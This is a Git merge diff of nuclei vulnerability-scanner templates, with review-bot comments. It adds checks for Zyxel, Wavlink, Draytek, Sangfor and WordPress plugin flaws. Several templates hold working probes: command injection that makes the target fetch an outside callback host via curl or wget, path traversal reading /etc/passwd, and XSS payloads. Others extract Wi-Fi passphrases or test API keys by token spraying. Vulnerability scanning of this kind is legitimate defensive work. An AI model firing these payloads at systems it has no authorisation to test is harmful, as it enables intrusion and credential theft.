Merge branch 'master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-05-16 16:12:31 -04:00 committed by GitHub
commit d064e64331
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
54 changed files with 2173 additions and 1572 deletions

@ -1,20 +1,11 @@
cves/2018/CVE-2018-19326.yaml
cves/2020/CVE-2020-36510.yaml
cves/2022/CVE-2022-1040.yaml
cves/2022/CVE-2022-1221.yaml
cves/2022/CVE-2022-29548.yaml
exposed-panels/privx-panel.yaml
exposed-panels/umbraco-login.yaml
exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml
exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml
exposures/configs/msmtp-config.yaml
misconfiguration/unauthorized-h3csecparh-login.yaml
technologies/cloudflare-nginx-detect.yaml
technologies/dedecms-detect.yaml
technologies/ecology-detect.yaml
technologies/jspxcms-detect.yaml
vulnerabilities/other/ecsimagingpacs-rce.yaml
vulnerabilities/wordpress/age-gate-open-redirect.yaml
vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
vulnerabilities/wordpress/wp-security-open-redirect.yaml
vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
cnvd/2020/CNVD-2020-46552.yaml
cves/2021/CVE-2021-20123.yaml
cves/2021/CVE-2021-20124.yaml
cves/2021/CVE-2021-25075.yaml
cves/2022/CVE-2022-1392.yaml
cves/2022/CVE-2022-30489.yaml
misconfiguration/oracle-ebusiness-registration-enabled.yaml
misconfiguration/unauth-wavink-panel.yaml
technologies/kubernetes-operational-view-detect.yaml
vulnerabilities/wordpress/seo-redirection-xss.yaml
workflows/yonyou-nc-workflow.yaml
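Review bot: the refreshed list omits three templates created in this same change, the ones with ids CVE-2022-30525, api-moonpay and gnuboard-sms-xss, while it does list the others added here (CNVD-2020-46552, CVE-2021-20123/20124/25075, CVE-2022-1392/30489, the Oracle and Wavlink misconfiguration checks, kubernetes-operational-view-detect, seo-redirection-xss and the Yonyou workflow). If the list is meant to track every template new in this merge, add the missing three; if it is intentionally the `master` side's list, note that in the commit message so the mismatch is not read as an oversight.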

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 |
| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 |
| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 |
| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 |
| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | |
| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | |
| rce | 289 | princechaddha | 130 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | |
| tech | 265 | gy741 | 117 | default-logins | 95 | | | | |
| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | |
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 |
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 |
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 |
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 |
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | |
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | |
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | |
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | |
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | |
**260 directories, 3520 files**.
**261 directories, 3543 files**.
</td>
</tr>
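Review bot: the tag column is out of step with the files added in this change: `cve2021` stays at 283 although three new templates tagged `cve2021` (CVE-2021-20123, CVE-2021-20124, CVE-2021-25075) are introduced here, while `cve` and the `cves` directory both move by +6 as expected for the six new CVE templates. The table looks generated from a pre-merge tree; regenerate the stats after the merge so README.md and TEMPLATES-STATS.md reflect the actual template set.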

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 |
| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 |
| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 |
| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 |
| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | |
| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | |
| rce | 289 | princechaddha | 130 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | |
| tech | 265 | gy741 | 117 | default-logins | 95 | | | | |
| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | |
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 |
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 |
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 |
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 |
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | |
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | |
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | |
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | |
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | |

@ -0,0 +1,25 @@
id: CNVD-2020-46552
info:
name: Sangfor EDR Tool - Remote Code Execution
author: ritikchaddha
severity: critical
description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
reference:
- https://www.modb.pro/db/144475
- https://blog.csdn.net/bigblue00/article/details/108434009
- https://cn-sec.com/archives/721509.html
tags: cnvd,cnvd2020,sangfor,rce
requests:
- method: GET
path:
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
matchers:
- type: dsl
dsl:
- 'contains(body, "$show_input = function($info)")'
- 'contains(body, "$strip_slashes($host)")'
- 'contains(body, "Log Helper")'
- 'status_code == 200'
condition: and
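Review bot: the matchers only prove that `/tool/log/c.php` returns its own source (`$show_input = function($info)`, `$strip_slashes($host)`, `Log Helper`), so nothing in the template tells a maintainer why `strip_slashes=printf&host=nl+c.php` is the probe or why the match is on the file's source rather than on command output; add a comment on the `path` entry stating that the callable named by `strip_slashes` is invoked on `host` and that this argument was chosen as a non-destructive check. The `info` block also lacks `classification` (`cwe-id: CWE-78` fits an OS command injection) and the `metadata` with a shodan/fofa query that the sibling templates in this change carry, and the description's "There is a RCE vulnerability" should read "an RCE vulnerability".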

@ -6,6 +6,10 @@ info:
severity: high
reference:
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
metadata:
verified: true
shodan-query: title:"ShopXO企业级B2C电商系统提供商"
fofa-query: app="ShopXO企业级B2C电商系统提供商"
tags: shopxo,lfi,cnvd,cnvd2021
requests:

@ -7,7 +7,7 @@ info:
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd,cnvd2021
tags: beanshell,rce,cnvd,cnvd2021,yonyou
requests:
- raw:
@ -27,7 +27,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "uid="
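Review bot: the second hunk (-27,7 +27,6) drops one line under `matchers` that is not visible in this view; with `matchers-condition: and` kept, confirm that more than the `uid=` regex remains, otherwise the `and` is a no-op and a page that merely echoes the injected BeanShell payload back would match. Keep at least a `status` matcher or a second marker from the `id` output (for example `gid=`) alongside `uid=`.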

@ -10,6 +10,8 @@ info:
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
classification:
cve-id: CVE-2010-0219
metadata:
shodan-query: http.html:"Apache Axis"
tags: cve,cve2010,axis,apache,default-login,axis2
requests:

@ -16,6 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-11978
cwe-id: CWE-77
metadata:
verified: true
shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs"
tags: cve,cve2020,apache,airflow,rce
requests:

@ -15,6 +15,8 @@ info:
cve-id: CVE-2020-11991
cwe-id: CWE-611
remediation: Upgrade to Apache Cocoon 2.1.13 or later.
metadata:
shodan-query: http.html:"Apache Cocoon"
tags: cve,cve2020,apache,xml,cocoon,xxe
requests:

@ -13,7 +13,10 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-13117
cwe-id: CWE-77
tags: cve,cve2020,wavlink,rce,oast
metadata:
verified: true
shodan-query: http.title:"Wi-Fi APP Login"
tags: cve,cve2020,wavlink,rce,oast,router
requests:
- raw:
@ -26,10 +29,20 @@ requests:
newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/05/16
- type: word
part: body
words:
- "parent.location.replace"
- type: status
status:
- 200
# Enhanced by mp on 2022/05/16
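Review bot: the new `parent.location.replace` body word and the `status 200` check are AND-ed with the interactsh callback, so a device that executes the injected `wget` but answers the login POST with a different page or status is now reported as not vulnerable. The OAST hit is the evidence of execution; either keep the body/status checks out of the `and` condition or record in a comment which firmware response was observed when `verified: true` was set, so a later false negative can be traced to this change.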

@ -15,6 +15,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-13927
metadata:
verified: true
shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow"
tags: cve,cve2020,apache,airflow,unauth
requests:

@ -0,0 +1,44 @@
id: CVE-2021-20123
info:
name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet
author: 0x_Akoko
severity: high
description: |
A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
reference:
- https://www.tenable.com/security/research/tra-2021-42
- https://www.cvedetails.com/cve/CVE-2021-20123/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-20123
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.html:"VigorConnect"
tags: cve,cve2021,draytek,lfi,vigorconnect
requests:
- method: GET
path:
- "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything"
- "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
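Review bot: the name says "Local File Inclusion" while `cwe-id: CWE-22`, the CVSS vector `C:H/I:N/A:N` and the `etc/passwd` / `win.ini` probes all describe an arbitrary file read through path traversal in `show_file_name`; inclusion implies the server executes the file, which nothing here claims. Rename to "Arbitrary File Read" or "Directory Traversal" so triage matches the vector. The `application/octet-stream` header requirement is a sensible third check, but note in a comment that it was observed on 1.6.0-B3, since any build that serves the file with another content type will be missed by the `and` condition.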

@ -0,0 +1,44 @@
id: CVE-2021-20124
info:
name: Draytek VigorConnect - Unauthenticated Local File Inclusion WebServlet
author: 0x_Akoko
severity: high
description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
reference:
- https://www.tenable.com/security/research/tra-2021-42
- https://www.draytek.com/products/vigorconnect/
- https://www.cvedetails.com/cve/CVE-2021-20124
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-20124
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.html:"VigorConnect"
tags: cve,cve2021,draytek,lfi,vigorconnect
requests:
- method: GET
path:
- "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd"
- "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
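Review bot: same naming point as the CVE-2021-20123 template: `WebServlet?act=getMapImg_acs2&filename=` reads a file and returns it, so "Local File Inclusion" overstates what `cwe-id: CWE-22` and the `C:H/I:N/A:N` vector describe; "Arbitrary File Read" keeps both templates consistent. The matcher block is a verbatim copy of the sibling's, which is fine, but the same content-type caveat applies.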

@ -15,6 +15,10 @@ info:
cvss-score: 6.5
cve-id: CVE-2021-21402
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.html:"Jellyfin"
fofa-query: title="Jellyfin" || body="http://jellyfin.media"
tags: cve,cve2021,jellyfin,lfi
requests:
@ -34,4 +38,4 @@ requests:
- type: regex
regex:
- "\\[(font|extension|file)s\\]"
part: body
part: body

@ -0,0 +1,60 @@
id: CVE-2021-25075
info:
name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS
author: DhiyaneshDK
severity: low
description: |
The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues.
remediation: Fixed in version 1.5.1.
reference:
- https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
cvss-score: 3.50
cve-id: CVE-2021-25075
cwe-id: CWE-862
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p
- |
GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "style=animation-name:rotation onanimationstart=alert(/XSS/) p"
- "toplevel_page_wpda_duplicate_post_menu"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
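Review bot: the second request posts to `admin-ajax.php?action=wprss_fetch_items_row_action` while the body carries `action=wpdevart_duplicate_post_parametrs_save_in_db`; the query-string action belongs to an unrelated plugin and the request only works because WordPress reads `$_REQUEST['action']`, where the POST value overrides the GET value under PHP's default `request_order`. Drop the stray query-string `action` so the check does not depend on that precedence. Since the payload is written into the plugin's stored `title_prefix` setting on the target (a stored XSS by design), the template should carry the `intrusive` tag used elsewhere in the repo, and `cvss-score: 3.50` should be `3.5` to match the format of the other templates.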

@ -14,6 +14,7 @@ info:
cve-id: CVE-2021-38540
cwe-id: CWE-306
metadata:
verified: true
shodan-query: title:"Sign In - Airflow"
tags: cve,cve2021,apache,airflow,rce

@ -11,6 +11,9 @@ info:
classification:
cve-id: CVE-2021-44451
remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
metadata:
verified: true
shodan-query: title:"Superset"
tags: cve,cve2021,apache,superset,default-login
requests:

@ -25,6 +25,7 @@ info:
variables:
auth: "admin:"
cmd: "echo CVE-2022-1388 | rev"
requests:
- raw:
@ -54,10 +55,6 @@ requests:
"utilCmdArgs": "-c '{{cmd}}'"
}
payloads:
cmd:
- 'echo CVE-2022-1388 | rev'
stop-at-first-match: true
matchers-condition: and
matchers:

@ -0,0 +1,36 @@
id: CVE-2022-1392
info:
name: Videos sync PDF <= 1.7.4 - Unauthenticated LFI
author: Veshraj
severity: high
description: The plugin does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues.
reference:
- https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
- https://packetstormsecurity.com/files/166534/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1392
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1392
metadata:
verified: true
tags: lfi,wp-plugin,cve,cve2022,wp,wordpress,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "failed to open stream: No such file or directory"
- "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"
condition: and
- type: status
status:
- 200
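Review bot: detection hinges on PHP's warning text being both emitted and spelled as expected: `failed to open stream: No such file or directory` is the PHP 7 wording, PHP 8 capitalises it to `Failed to open stream`, and nuclei word matchers are case-sensitive unless `case-insensitive: true` is set, so add that flag or match on the `REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php` fragment alone. A target with `display_errors` off never prints either string and the template reports nothing even though the unvalidated `include` is still exploitable; that limitation belongs in a comment. Minor: `tags` lists both `wp` and `wordpress`, and `classification` has no `cwe-id` (CWE-98 fits a PHP include controlled by a request parameter).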

@ -15,7 +15,8 @@ info:
cve-id: CVE-2022-24288
cwe-id: CWE-78
metadata:
shodan-query: title:"Airflow - DAGs"
verified: true
shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow"
tags: cve,cve2022,airflow,rce
requests:

@ -0,0 +1,40 @@
id: CVE-2022-30489
info:
name: Wavlink Wn535g3 - POST XSS
author: For3stCo1d
severity: high
reference:
- https://github.com/badboycxcc/XSS-CVE-2022-30489
- https://nvd.nist.gov/vuln/detail/CVE-2022-30489
metadata:
verified: true
shodan-query: http.title:"Wi-Fi APP Login"
tags: xss,cve2022,wavlink,cve,router,iot
description: "WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi."
requests:
- raw:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(document.domain);</script>'
- 'parent.location.replace("http://")'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
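Review bot: `description` sits after `tags` while every other template in this change keeps it directly under `severity`; move it up to match the repo's key order. The POST body hard-codes `key=M27234733` and `password=63a36bceec2d3bba30d8611c323f4cda` with no explanation; if the reflection of `hostname` does not depend on them, drop them, otherwise comment where they come from, because a reader cannot tell whether they are device-specific. `severity: high` for a reflected XSS on a login page is also out of line with the `medium` used for seo-redirection-xss in this same change.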

@ -0,0 +1,35 @@
id: CVE-2022-30525
info:
name: Zyxel Firewall - Unauthenticated RCE
author: h1ei1,prajiteshsingh
severity: critical
description: |
The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on.
reference:
- https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
- https://github.com/rapid7/metasploit-framework/pull/16563
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
metadata:
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
tags: rce,zyxel,cve,cve2022,firewall,unauth
requests:
- raw:
- |
POST /ztp/cgi-bin/handler HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 500
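Review bot: the `description` is a garbled translation ("target the affected device as nobody Execute arbitrary code as a user on"); it should say that an unauthenticated remote attacker can execute arbitrary code on the device as the `nobody` user. `shodan-query` is a comma-separated run of quoted titles, which Shodan does not treat as alternatives; write it as `title:"USG FLEX 100" || title:"USG FLEX 100w" || ...` the way the Airflow templates in this change do. Requiring `status 500` in an `and` with the interactsh hit makes the callback, which is the actual proof of the `mtu` injection, insufficient on its own; if the 500 was observed on the tested firmware, say so in a comment. The template also lacks `classification` (take the vector from the NVD reference) and the `verified` metadata the sibling templates carry.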

@ -9,6 +9,8 @@ info:
- https://www.exploit-db.com/ghdb/6846
classification:
cwe-id: CWE-200
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: panel,adobe,coldfusion
requests:

@ -6,6 +6,8 @@ info:
severity: low
reference:
- https://securiteam.com/windowsntfocus/5bp081f0ac/
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: exposure,coldfusion,adobe
requests:

@ -7,6 +7,8 @@ info:
reference:
- https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
- https://twitter.com/Daviey/status/1374070630283415558
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: rce,adobe,misc,coldfusion
requests:

@ -4,6 +4,9 @@ info:
name: Airflow Debug Trace
author: pdteam
severity: low
metadata:
verified: true
shodan-query: title:"Airflow - DAGs"
tags: apache,airflow,fpd
requests:

@ -0,0 +1,32 @@
id: oracle-ebusiness-registration-enabled
info:
name: Oracle E-Business Login Panel Registration Accessible
author: 3th1c_yuk1,tess
severity: info
description: Oracle E-Business Login Panel Registration Accessible.
reference:
- https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac
- https://twitter.com/GodfatherOrwa/status/1514720677173026816
metadata:
verified: true
shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200
tags: oracle,misconfig
requests:
- method: GET
path:
- '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp'
matchers-condition: and
matchers:
- type: word
words:
- 'Registration'
- 'Register as individual'
- '<!-- ibeCZzpRuntimeIncl.jsp end -->'
condition: and
- type: status
status:
- 200
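Review bot: `description` merely repeats the name; state what the finding means, namely that the self-registration page `/OA_HTML/ibeCAcpSSOReg.jsp` is reachable so anyone can create an account in the E-Business Suite instance, which is the access the referenced write-up describes. With that stated, `severity: info` looks low for an open self-registration endpoint; either justify it in a comment or raise it.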

@ -0,0 +1,44 @@
id: unauth-wavink-panel
info:
name: Unauthenticated Wavlink Panel
author: princechaddha
severity: high
metadata:
verified: true
shodan-query: http.title:"Wi-Fi APP Login"
tags: exposure,wavlink,unauth,misconfig,router
requests:
- method: GET
path:
- "{{BaseURL}}/wifi_base.shtml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>APP</title>"
- type: regex
part: body
regex:
- 'var passphraseKey12="(.*)";'
- type: word
part: body
negative: true
words:
- 'var passphraseKey12="";'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'var passphraseKey12="(.*)";'
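Review bot: `passphraseKey12="(.*)";` is greedy, so if the line holding the key contains a later `";` the captured group runs past the passphrase; use `"([^"]*)"` in both the matcher and the extractor. The extractor also writes the Wi-Fi passphrase into scan output, which is what justifies `severity: high` but should be said explicitly, and the template has no `description` or `reference` at all, unlike the other Wavlink templates in this change.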

@ -4,6 +4,9 @@ info:
name: Apache Airflow
author: pdteam
severity: info
metadata:
verified: true
shodan-query: http.html:"Apache Airflow"
tags: tech,apache,airflow
requests:

@ -5,6 +5,9 @@ info:
author: dogasantos
severity: info
description: Axis and Axis2 detection
metadata:
verified: true
shodan-query: http.html:"Apache Axis"
tags: tech,axis2,middleware,apache
requests:

@ -5,6 +5,8 @@ info:
author: ffffffff0x
severity: info
metadata:
verified: true
shodan-query: http.html:"Apache Cocoon"
fofa-query: app="APACHE-Cocoon"
tags: apache,cocoon,tech

@ -2600,3 +2600,8 @@ requests:
name: "Gradle-enterprise"
dsl:
- "status_code==200 && (\"1614287628\" == mmh3(base64_py(body)))"
- type: dsl
name: "Kubernetes-Operational-View"
dsl:
- "status_code==200 && (\"2130463260\" == mmh3(base64_py(body)))"

@ -14461,7 +14461,7 @@ requests:
- /yimioa.apk
- type: word
name: yongyou-ism
name: yonyou-ism
words:
- sheight*window.screen.deviceydpi

@ -4,6 +4,9 @@ info:
name: Jellyfin detected
author: dwisiswant0
severity: info
metadata:
verified: true
shodan-query: http.html:"Jellyfin"
tags: tech,jellyfin
requests:

@ -2,7 +2,7 @@ id: kong-detect
info:
name: Detect Kong
author: geeknik
author: geeknik,joshlarsen
severity: info
description: The Cloud-Native API Gateway
reference:
@ -14,16 +14,18 @@ requests:
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
- type: word
part: header
regex:
- "[Ss]erver: [Kk]ong+"
words:
- "server: kong"
- "x-kong-response-latency"
- "x-kong-upstream-latency"
- "x-kong-proxy-latency"
condition: or
case-insensitive: true
extractors:
- type: kval
part: header
kval:
- server

@ -0,0 +1,34 @@
id: kubernetes-operational-view-detect
info:
name: Kubernetes Operational View Detect
author: idealphase
severity: info
reference:
- https://github.com/hjacobs/kube-ops-view
- https://codeberg.org/hjacobs/kube-ops-view
metadata:
verified: true
shodan-query: http.title:"Kubernetes Operational View"
tags: tech,k8s,kubernetes,devops,kube
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- "<title>Kubernetes Operational View"
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '<title>Kubernetes Operational View (.+)<\/title>'

@ -17,6 +17,8 @@ requests:
matchers:
- type: word
part: body
negative: true
words:
- 'Unknown key'
- '"Id":'
- '"Type":'
- '"Text":'
condition: and
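Review bot: `negative: true` combined with `condition: and` inverts the conjunction, so this matcher fires whenever at least one of `Unknown key`, `"Id":`, `"Type":`, `"Text":` is missing from the body, not when all of them are absent. If the intent is "none of these strings present", use `condition: or` under the negative matcher; if `Unknown key` is the failure marker and the three JSON keys are the success marker, split them into two matchers (one negative word matcher for the error, one positive matcher with `condition: and` for the keys).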

@ -0,0 +1,22 @@
id: api-moonpay
info:
name: MoonPay API Test
author: 0ri2N
severity: info
reference:
- https://dashboard.moonpay.com/getting_started
tags: token-spray,moonpay,cryptocurrencies
self-contained: true
requests:
- method: GET
path:
- "https://api.moonpay.com/v3/currencies/btc/buy_quote?apiKey={{token}}&baseCurrencyAmount=1"
matchers:
- type: word
part: body
words:
- '"accountId":'
condition: and
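Review bot: `condition: and` over a single word is a no-op; drop it or add a second key expected in a valid quote response. With no `status` matcher and no `matchers-condition`, any response whose body happens to contain `"accountId":` is reported as a working key; pair the body word with a `status: 200` matcher under `matchers-condition: and` so an error page that echoes the field name does not count.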

@ -6,6 +6,8 @@ info:
severity: medium
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,upload,fileupload,intrusive
requests:

@ -7,6 +7,8 @@ info:
description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site.
reference:
- https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: adobe,coldfusion,xss
requests:

@ -7,6 +7,9 @@ info:
description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
reference:
- https://www.cnblogs.com/milantgh/p/3615986.html
metadata:
verified: true
shodan-query: http.html:"power by dedecms" || title:"dedecms"
tags: dedecms
requests:

@ -6,6 +6,9 @@ info:
severity: low
reference:
